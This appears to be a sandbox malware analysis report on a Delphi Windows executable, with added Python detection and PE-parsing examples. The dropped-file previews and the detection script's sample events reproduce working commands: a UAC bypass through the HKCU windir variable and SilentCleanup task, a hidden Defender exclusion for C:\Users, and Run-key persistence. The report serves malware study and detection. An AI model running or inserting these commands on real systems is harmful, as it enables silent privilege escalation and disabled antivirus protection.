                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

Time | Type | Description
22:02:27 | API Interceptor | 2x Sleep call for process: ZfigYV6HXd.exe modified
22:02:33 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kkjczlm C:\Users\Public\Libraries\mlzcjkK.url
22:02:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Kkjczlm C:\Users\Public\Libraries\mlzcjkK.url
22:03:09 | API Interceptor | 2x Sleep call for process: Kkjczlm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASN

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\Public\KDECO.bat
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):155
                    Entropy (8bit):4.687076340713226
                    Encrypted:false
                    SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                    MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                    SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                    SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                    SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                    Malicious:false
                    Reputation:unknown
                    Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                    C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1017856
                    Entropy (8bit):6.210047247943823
                    Encrypted:false
                    SSDEEP:12288:FYfGUHuv5bSkBsFkT5m3GpOAz1DeoAdrL7i:FYOUUtBs2YqO8ArPi
                    MD5:1A1A9B3969ABCD2FCCD2C6CE20BE68AC
                    SHA1:4AA438483D23766F72BA0F4E2BCCB2DD30689845
                    SHA-256:80B539D191E840C8F421B2A1C34DCDD34961675D43D678D08B55D17F1E97FC63
                    SHA-512:865CF4ACA0E9561F83F102B0F97844F17DB6DA911ACBCFB5112026809A8241008FCE36EE4D546A13747AAA910A278CEAE2C8BE2ABB79522C1C4AF97A5FE008A9
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 27%
                    Reputation:unknown
                    Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................x.............@..............................................@..............................x#.......R...................0...g........................... ......................................................CODE................................ ..`DATA....x...........................@...BSS.....m................................idata..x#.......$..................@....tls.....................................rdata....... ......................@..P.reloc...g...0...h..................@..P.rsrc....R.......R...6..............@..P....................................@..P........................................................................................................................................
                    C:\Users\Public\Libraries\mlzcjkK.url
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Kkjczlm\\Kkjczlm.exe">), ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):96
                    Entropy (8bit):4.923940501696146
                    Encrypted:false
                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMO7OPGhEysGKd6ov:HRYFVmTWDyzh5EysbDv
                    MD5:AACA35EE81385686A35CBABFB1DAFA94
                    SHA1:5EDA4BEE9BF9E762DB899F9686AF6482DFD48DB1
                    SHA-256:A416DF31769CBEC14D15EF6F87615F26C1B684A188C6EF575D14CF398D886033
                    SHA-512:877A2FDFAA19546FFDE6A433C11B2952190BB3C59C1DE0EB7752C41CC19DB1733E718DA9135A597CFBA7ABAF6C891466FBDF7FADFA84B163AF40FEEB75F3215D
                    Malicious:false
                    Yara Hits:
                    • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\mlzcjkK.url, Author: @itsreallynick (Nick Carr)
                    Reputation:unknown
                    Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Kkjczlm\\Kkjczlm.exe"..IconIndex=2..
                    C:\Users\Public\Trast.bat
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):34
                    Entropy (8bit):4.314972767530033
                    Encrypted:false
                    SSDEEP:3:LjTnaHF5wlM:rnaHSM
                    MD5:4068C9F69FCD8A171C67F81D4A952A54
                    SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                    SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                    SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                    Malicious:false
                    Reputation:unknown
                    Preview: start /min C:\Users\Public\UKO.bat
                    C:\Users\Public\UKO.bat
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):250
                    Entropy (8bit):4.865356627324657
                    Encrypted:false
                    SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                    MD5:EAF8D967454C3BBDDBF2E05A421411F8
                    SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                    SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                    SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                    Malicious:false
                    Reputation:unknown
                    Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                    C:\Users\Public\nest
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):9
                    Entropy (8bit):3.169925001442312
                    Encrypted:false
                    SSDEEP:3:yn:W
                    MD5:77867F45FFB88FD5F4E38ABBC7D47E0C
                    SHA1:7CD5431C381F0EA2A93DF5F6186F320573AABF51
                    SHA-256:EC1C5E0981130CC4258BD30385F54BCE775205F658DFAEB085188E7F0B9F6C8B
                    SHA-512:F191A8DF3F0350319815237D6D189B830E3DE99AD4FCF3D13D9C05C56E9CB097E4ED129E98550285E9C00893407483AF948B450233C2850D356C2D5D12D925C7
                    Malicious:false
                    Reputation:unknown
                    Preview: Kkjczlm..
                    C:\Users\Public\nest.bat
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):53
                    Entropy (8bit):4.263285494083192
                    Encrypted:false
                    SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                    MD5:8ADA51400B7915DE2124BAAF75E3414C
                    SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                    SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                    SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                    Malicious:false
                    Reputation:unknown
                    Preview: start /min reg delete hkcu\Environment /v windir /f..
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\Kkjczlmayclzjlniqyuemyubilsdhtk[2]
                    Process:C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):844800
                    Entropy (8bit):7.998394973689219
                    Encrypted:true
                    SSDEEP:24576:G3uO68rue47sNnvwP0N8AkGZ5ut74t8Ld/xUjdqJ3:S16Y1NvwsN6destxUj0l
                    MD5:D98F519CB11BC5AAC475F4C0E4BDCA82
                    SHA1:6894D2C17C83FB6FF202D2460395FB5BD0EC7A61
                    SHA-256:0CB64ABDA5ED26EF559E42D02BBE1A49BB6A380AC42494A5A346E01A1C1BDB3E
                    SHA-512:8E271AFE926962EA3D2CCE2E00038592DED897B676B5E1597803BEE184BA265D2B5D84192BABBC33E65EFF74CAC0CFE5CD61AB3C092A86A4ACCDF9A9DCF886F3
                    Malicious:false
                    Reputation:unknown
                    Preview: ...].~*.g.a.........3?Y.% ...s...0.d(.<...H.@.N..f..[.....=U.MxW...))...U...`!....Q.f..d.e.Im..W..."...j6.>..a.6.~c..y.&..S...?Y........H.@.N..f..[......!~.;.........[..jn..N.....q....D.u....8.ha.:.._..^-j`x...;.;u..{....`u.N.Thc."..%s..q.1lbs.....%.C.)F...G..2......^N.G[..jn..N.....q....D.u....8...K .&.3m....a.F..6..va..S......?6.G8..f}../....rfz..=pt}.K..3[..0.Q>l..M.>Jk2?..v....>Y...L|..M..n.g/.\. .i,%.b.r.......Nt..k#...W.W...w.`$...~O.G.d...3.H.!7.f...9.P.N[(.LJR0.x...#..A.29.:LsI.E..>S...|........`..`..-...k%...{\.?...!....-.A..i/.V.......U.X..h.)...C.+.b.>Li7..l..Dq\.8^..~.k;.1.I.Pv.4G.k".p..(....I.t...R...HwW..De..wPw......#...x.NsA..].e/.Y.|.&#....a'...}x.yW..v.:Fc"...k"..o].^.l.a'.qT..Lk3./.n.,1.+....d.<G.4K.~.|4Q..B|.#.x....X.....G.E..uV...{Z.`.....Fn.K..8U.|.'..qY...Q..."..._...p...{V....z.G.......'.:Jj.<V.{@Q...{@O.I..c.........X.?...... .m*>T.r.p..k%.z....BNIBHi7....8..*'..>..J{C..`.Z....k.n./..B...M.>^.r..E.Pv....y^.i.#..J
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\Kkjczlmayclzjlniqyuemyubilsdhtk[1]
                    Process:C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):844800
                    Entropy (8bit):7.998394973689219
                    Encrypted:true
                    SSDEEP:24576:G3uO68rue47sNnvwP0N8AkGZ5ut74t8Ld/xUjdqJ3:S16Y1NvwsN6destxUj0l
                    MD5:D98F519CB11BC5AAC475F4C0E4BDCA82
                    SHA1:6894D2C17C83FB6FF202D2460395FB5BD0EC7A61
                    SHA-256:0CB64ABDA5ED26EF559E42D02BBE1A49BB6A380AC42494A5A346E01A1C1BDB3E
                    SHA-512:8E271AFE926962EA3D2CCE2E00038592DED897B676B5E1597803BEE184BA265D2B5D84192BABBC33E65EFF74CAC0CFE5CD61AB3C092A86A4ACCDF9A9DCF886F3
                    Malicious:false
                    Reputation:unknown
                    Preview: ...].~*.g.a.........3?Y.% ...s...0.d(.<...H.@.N..f..[.....=U.MxW...))...U...`!....Q.f..d.e.Im..W..."...j6.>..a.6.~c..y.&..S...?Y........H.@.N..f..[......!~.;.........[..jn..N.....q....D.u....8.ha.:.._..^-j`x...;.;u..{....`u.N.Thc."..%s..q.1lbs.....%.C.)F...G..2......^N.G[..jn..N.....q....D.u....8...K .&.3m....a.F..6..va..S......?6.G8..f}../....rfz..=pt}.K..3[..0.Q>l..M.>Jk2?..v....>Y...L|..M..n.g/.\. .i,%.b.r.......Nt..k#...W.W...w.`$...~O.G.d...3.H.!7.f...9.P.N[(.LJR0.x...#..A.29.:LsI.E..>S...|........`..`..-...k%...{\.?...!....-.A..i/.V.......U.X..h.)...C.+.b.>Li7..l..Dq\.8^..~.k;.1.I.Pv.4G.k".p..(....I.t...R...HwW..De..wPw......#...x.NsA..].e/.Y.|.&#....a'...}x.yW..v.:Fc"...k"..o].^.l.a'.qT..Lk3./.n.,1.+....d.<G.4K.~.|4Q..B|.#.x....X.....G.E..uV...{Z.`.....Fn.K..8U.|.'..qY...Q..."..._...p...{V....z.G.......'.:Jj.<V.{@Q...{@O.I..c.........X.?...... .m*>T.r.p..k%.z....BNIBHi7....8..*'..>..J{C..`.Z....k.n./..B...M.>^.r..E.Pv....y^.i.#..J
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Kkjczlmayclzjlniqyuemyubilsdhtk[2]
                    Process:C:\Users\user\Desktop\ZfigYV6HXd.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):844800
                    Entropy (8bit):7.998394973689219
                    Encrypted:true
                    SSDEEP:24576:G3uO68rue47sNnvwP0N8AkGZ5ut74t8Ld/xUjdqJ3:S16Y1NvwsN6destxUj0l
                    MD5:D98F519CB11BC5AAC475F4C0E4BDCA82
                    SHA1:6894D2C17C83FB6FF202D2460395FB5BD0EC7A61
                    SHA-256:0CB64ABDA5ED26EF559E42D02BBE1A49BB6A380AC42494A5A346E01A1C1BDB3E
                    SHA-512:8E271AFE926962EA3D2CCE2E00038592DED897B676B5E1597803BEE184BA265D2B5D84192BABBC33E65EFF74CAC0CFE5CD61AB3C092A86A4ACCDF9A9DCF886F3
                    Malicious:false
                    Reputation:unknown
                    Preview: ...].~*.g.a.........3?Y.% ...s...0.d(.<...H.@.N..f..[.....=U.MxW...))...U...`!....Q.f..d.e.Im..W..."...j6.>..a.6.~c..y.&..S...?Y........H.@.N..f..[......!~.;.........[..jn..N.....q....D.u....8.ha.:.._..^-j`x...;.;u..{....`u.N.Thc."..%s..q.1lbs.....%.C.)F...G..2......^N.G[..jn..N.....q....D.u....8...K .&.3m....a.F..6..va..S......?6.G8..f}../....rfz..=pt}.K..3[..0.Q>l..M.>Jk2?..v....>Y...L|..M..n.g/.\. .i,%.b.r.......Nt..k#...W.W...w.`$...~O.G.d...3.H.!7.f...9.P.N[(.LJR0.x...#..A.29.:LsI.E..>S...|........`..`..-...k%...{\.?...!....-.A..i/.V.......U.X..h.)...C.+.b.>Li7..l..Dq\.8^..~.k;.1.I.Pv.4G.k".p..(....I.t...R...HwW..De..wPw......#...x.NsA..].e/.Y.|.&#....a'...}x.yW..v.:Fc"...k"..o].^.l.a'.qT..Lk3./.n.,1.+....d.<G.4K.~.|4Q..B|.#.x....X.....G.E..uV...{Z.`.....Fn.K..8U.|.'..qY...Q..."..._...p...{V....z.G.......'.:Jj.<V.{@Q...{@O.I..c.........X.?...... .m*>T.r.p..k%.z....BNIBHi7....8..*'..>..J{C..`.Z....k.n./..B...M.>^.r..E.Pv....y^.i.#..J
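
The batch files and the Run key above form one chain rather than unrelated droppings. Trast.bat starts UKO.bat; UKO.bat writes a command into the user-writable HKCU\Environment\windir value and immediately runs the \Microsoft\Windows\DiskCleanup\SilentCleanup scheduled task, which expands %windir% while launching its action with the user's highest available token, so the planted command (start KDECO.bat, then delete the value again) runs elevated without a UAC prompt. KDECO.bat then excludes C:\Users from Microsoft Defender scanning, which covers everything this sample drops under C:\Users\Public; nest.bat repeats the value deletion so the hijack leaves no trace; and the Run key points at the .url shortcut instead of the executable, which is what the Methodology_Contains_Shortcut_OtherURIhandlers Yara hit flags. The detection below is an added example written for this report, not Joe Sandbox code: it replays those commands as constructed, Sysmon-like process-creation and registry-value events and flags the windir hijack, the correlated SilentCleanup run, the Defender exclusion and the .url Run-key entry. The Event and Finding field names, the HKCU path spelling (Sysmon itself logs HKU\<SID>\...) and the two benign records mixed in are assumptions.

```python
"""Detection logic for the batch-file chain shown in the dropped-file previews above.

Added example, not part of the Joe Sandbox report. The events are constructed,
Sysmon-like records that replay the commands from Trast.bat, UKO.bat, nest.bat
and KDECO.bat plus the Run-key entry; field names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" (Sysmon Event ID 1) or "registry" (Sysmon Event ID 13)
    image: str = ""
    command_line: str = ""
    target: str = ""     # registry value path, registry events only
    details: str = ""    # registry value data, registry events only


@dataclass
class Finding:
    rule: str
    technique: str       # ATT&CK technique id
    evidence: str
    correlated: bool = False


# HKCU\Environment\windir is user-writable, and the SilentCleanup scheduled task expands
# %windir% when it launches its action with the user's highest token, so planting a
# command there and running the task is the T1548.002 primitive UKO.bat uses.
WINDIR_VALUE = re.compile(r"\\Environment\\windir$", re.I)
REG_ADD_WINDIR = re.compile(r"\breg(\.exe)?\s+add\s+\S*environment\s+/v\s+windir\b", re.I)
RUN_VALUE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$", re.I)
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\s.*?-exclusion(path|process|extension)\b", re.I)


def is_silentcleanup_trigger(command_line: str) -> bool:
    low = command_line.lower()
    return "schtasks" in low and "/run" in low and "diskcleanup\\silentcleanup" in low


def detect(events):
    """Evaluate an ordered event stream. Order matters: the SilentCleanup trigger is
    only marked correlated when a windir hijack was seen earlier in the stream."""
    findings = []
    windir_staged = False
    for ev in events:
        if ev.kind == "registry":
            if WINDIR_VALUE.search(ev.target):
                windir_staged = True
                findings.append(Finding("windir-env-hijack", "T1548.002", f"{ev.target} = {ev.details}"))
            elif RUN_VALUE.search(ev.target) and ev.details.strip('"').lower().endswith(".url"):
                findings.append(Finding("run-key-url-shortcut", "T1547.001", f"{ev.target} = {ev.details}"))
        elif ev.kind == "process":
            cmd = ev.command_line
            if REG_ADD_WINDIR.search(cmd):          # process telemetry catches the write too
                windir_staged = True
                findings.append(Finding("windir-env-hijack", "T1548.002", cmd))
            elif is_silentcleanup_trigger(cmd):
                findings.append(Finding("silentcleanup-trigger", "T1548.002", cmd, correlated=windir_staged))
            elif DEFENDER_EXCLUSION.search(cmd):
                findings.append(Finding("defender-exclusion", "T1562.001", cmd))
    return findings


# Constructed replay of the report's chain, with two benign records mixed in (assumed data).
SAMPLE_EVENTS = [
    Event("registry", target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Kkjczlm",
          details=r"C:\Users\Public\Libraries\mlzcjkK.url"),
    Event("registry", target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
          details=r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),     # benign
    Event("process", image=r"C:\Windows\System32\reg.exe",
          command_line=r"reg delete hkcu\Environment /v windir /f"),
    Event("process", image=r"C:\Windows\System32\reg.exe",
          command_line=r'reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "'),
    Event("registry", target=r"HKCU\Environment\windir",
          details=r"cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "),
    Event("process", image=r"C:\Windows\System32\schtasks.exe",
          command_line=r"schtasks /Query /TN \Microsoft\Windows\DiskCleanup\SilentCleanup"),  # benign
    Event("process", image=r"C:\Windows\System32\schtasks.exe",
          command_line=r"schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I"),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          command_line=r'''powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"'''),
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.rule:<24} {f.technique:<10} correlated={f.correlated}  {f.evidence}")
```

Run as a script it prints five findings (the windir write is reported twice, once from the reg.exe command line and once from the registry event, because either telemetry source alone may be missing). In a real pipeline feed it Event ID 1 and 13 records in timestamp order; the correlated flag on the SilentCleanup run depends on the windir write having been seen first.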

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.210047247943823
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.24%
                    • InstallShield setup (43055/19) 0.43%
                    • Win32 Executable Delphi generic (14689/80) 0.15%
                    • Windows Screen Saver (13104/52) 0.13%
                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                    File name:ZfigYV6HXd.exe
                    File size:1017856
                    MD5:1a1a9b3969abcd2fccd2c6ce20be68ac
                    SHA1:4aa438483d23766f72ba0f4e2bccb2dd30689845
                    SHA256:80b539d191e840c8f421b2a1c34dcdd34961675d43d678d08b55d17f1e97fc63
                    SHA512:865cf4aca0e9561f83f102b0f97844f17db6da911acbcfb5112026809a8241008fce36ee4d546a13747aaa910a278ceae2c8be2abb79522c1c4af97a5fe008a9
                    SSDEEP:12288:FYfGUHuv5bSkBsFkT5m3GpOAz1DeoAdrL7i:FYOUUtBs2YqO8ArPi
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                    File Icon

                    Icon Hash:8aa2b2b2a2ead4ca

                    Static PE Info

                    General

                    Entrypoint:0x45d078
                    Entrypoint Section:CODE
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:91a12f22e7f2305a107edddf42c40880
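
The Time Stamp row above decodes to 19 June 1992, which is not when this sample was built: 0x2A425E19 is the constant that Borland Delphi linkers write into every image they produce, and it agrees with the other Delphi hints in this report (the MZP DOS stub in the file preview, the CODE/DATA/BSS section names, the Delphi entries in the TrID list, and the characteristics flags listed above, which sum to 0x818E). The parser below is an added example, not Joe Sandbox code. It reads the COFF file header fields shown in the table and applies that check; the sample bytes are a constructed minimal DOS header plus COFF header carrying the report's values, not bytes taken from the analysed file.

```python
"""Static PE header triage for the values in the Static PE Info table above.

Added example, not part of the Joe Sandbox report. build_sample() constructs a
minimal DOS header + COFF file header with the report's values (Machine i386,
8 sections, TimeDateStamp 0x2A425E19, Characteristics 0x818E); it is not the
analysed file.
"""
import struct
from datetime import datetime, timezone

# Borland/Delphi linkers write this constant into TimeDateStamp of every image they
# build, so it is a toolchain fingerprint, not a compile time.
DELPHI_FIXED_TIMESTAMP = 0x2A425E19

MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}

CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0080: "BYTES_REVERSED_LO",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
    0x8000: "BYTES_REVERSED_HI",
}


def parse_coff_header(data: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE signature and decode the 20-byte COFF file header."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    machine, nsections, timestamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "optional_header_size": opt_size,
        "characteristics": [name for bit, name in sorted(CHARACTERISTICS.items()) if chars & bit],
        "dll": bool(chars & 0x2000),
    }


def triage(hdr: dict) -> list:
    """Observations a reviewer checks before trusting anything else in the header."""
    notes = []
    if hdr["timestamp"] == DELPHI_FIXED_TIMESTAMP:
        notes.append("TimeDateStamp is the Delphi linker constant; ignore the 1992 date")
    if hdr["timestamp"] == 0:
        notes.append("TimeDateStamp zeroed (reproducible build or deliberately scrubbed)")
    if hdr["machine"] == "i386" and "32BIT_MACHINE" not in hdr["characteristics"]:
        notes.append("i386 image without 32BIT_MACHINE flag")
    if "DLL" not in hdr["characteristics"] and "EXECUTABLE_IMAGE" in hdr["characteristics"]:
        notes.append("standalone executable (no DLL flag)")
    return notes


def build_sample() -> bytes:
    """Constructed header with the report's values; 'MZP' mirrors the Delphi DOS stub."""
    dos = bytearray(0x40)
    dos[:3] = b"MZP"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE header right after the stub
    coff = struct.pack("<HHIIIHH", 0x014C, 8, 0x2A425E19, 0, 0, 0xE0, 0x818E)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    header = parse_coff_header(build_sample())
    for key, value in header.items():
        print(f"{key}: {value}")
    for note in triage(header):
        print("note:", note)
```

On a real file pass the first few kilobytes to parse_coff_header; the same walk reaches the section table (NumberOfSections entries of 40 bytes after the optional header), which is where the CODE/DATA/BSS names in the preview come from.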

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFF0h
                    mov eax, 0045CE78h
                    call 00007F8C4CBB42E5h
                    nop
                    nop
                    nop
                    nop
                    mov eax, dword ptr [004EBEE4h]
                    mov eax, dword ptr [eax]
                    call 00007F8C4CC01399h
                    mov ecx, dword ptr [004EC070h]
                    mov eax, dword ptr [004EBEE4h]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [0045CAD8h]
                    call 00007F8C4CC01399h
                    mov eax, dword ptr [004EBEE4h]
                    mov eax, dword ptr [eax]
                    call 00007F8C4CC0140Dh
                    call 00007F8C4CBB2070h
                    lea eax, dword ptr [eax+00h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    Name                                  Virtual Address  Virtual Size  Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT          0xee000          0x2378        .idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0xfa000          0x5200        .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf3000          0x67b8        .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_TLS             0xf2000          0x18          .rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                    Sections

                    Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                    CODE    0x1000           0x5c0c4       0x5c200   False     0.52856014671    data       6.54808365971   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
